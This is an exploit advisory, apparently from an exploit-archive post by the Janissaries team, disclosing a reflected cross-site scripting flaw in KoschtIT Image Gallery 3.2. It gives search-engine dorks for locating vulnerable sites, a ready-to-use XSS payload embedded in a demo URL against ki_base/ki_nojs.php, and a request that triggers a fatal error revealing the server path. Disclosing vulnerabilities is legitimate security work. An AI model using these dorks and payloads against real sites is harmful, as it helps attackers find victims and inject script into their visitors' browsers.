KoschtIT Image Gallery version 3.2 suffers from a cross site scripting vulnerability.
d995444066c1089280796083a3293f20919b5d37944e1a2be12d1a7cab2a8a5a
#########################################################################
# __ .__ .__ #
# |__|____ ____ |__| ______ ___________ _______|__| ____ ______ #
# | \__ \ / \| |/ ___// ___/\__ \\_ __ \ |/ __ \ / ___/ #
# | |/ __ \| | \ |\___ \ \___ \ / __ \| | \/ \ ___/ \___ \ #
#/\__| (____ /___| /__/____ >____ >(____ /__| |__|\___ >____ > #
#\______| \/ \/ \/ \/ \/ \/ \/ #
# www.janissaries.org #
##=====================================================================##
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
«««:»»» koschtit_image_gallery(v3.2) Cross Site Scripting «««:»»»
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
./Title Exploit : KoschtIT Image Gallery Cross Site Scripting [XSS]
./WebApps URL : http://koschtit.tabere.net/en/#download
./Author Exploit: [ TheMirkin ] [ th3mirkin@gmail.com.com ] [ All Janissaries ]
./Security Risk : [ High Level ]
./Category XPL : [ WebApps]
./Time & Date : 11.12.2014. 09:55 PM.
./Tested on: [Windos 8]
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#################################################################################
#
#
# Dork : inur:ki_nojs.php?gallery
# inurl:ki_base
#
# #=> Exploit: Cross Site Scripting [XSS]
# This vulnerability affects
File : ki_base/ki_nojs.php
# GET input site was set to ' onmouseover=prompt(956927) bad='
# Demo:
# http://[rarget]/ki_base/ki_nojs.php?gallery=gallery2&site=%27%20onmouseover%3dprompt%28956927%29%20bad%3d%27&startfrom=1
#
# #=> Application error message
# ki_nojs.php?gallery=gallery2&site=/en/&startfrom[]=18
# http://[rarget]/ki_base/ki_nojs.php?gallery=gallery2&site=/en/&startfrom[]=18
Fatal error: Unsupported operand types in /home/user/publis_html/script/ki_base/ki_nojs.php on line 365
#
#
# xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[ Thanks For All ]xxxxxxxxxxxxxxxxxxxxxxxxxxxxx #
# Special Thanks : Burtay and All Janissaries Team(Burtay,B127Y,Miyachung,3spi0n,TheMirkin,Michelony)
#################################################################################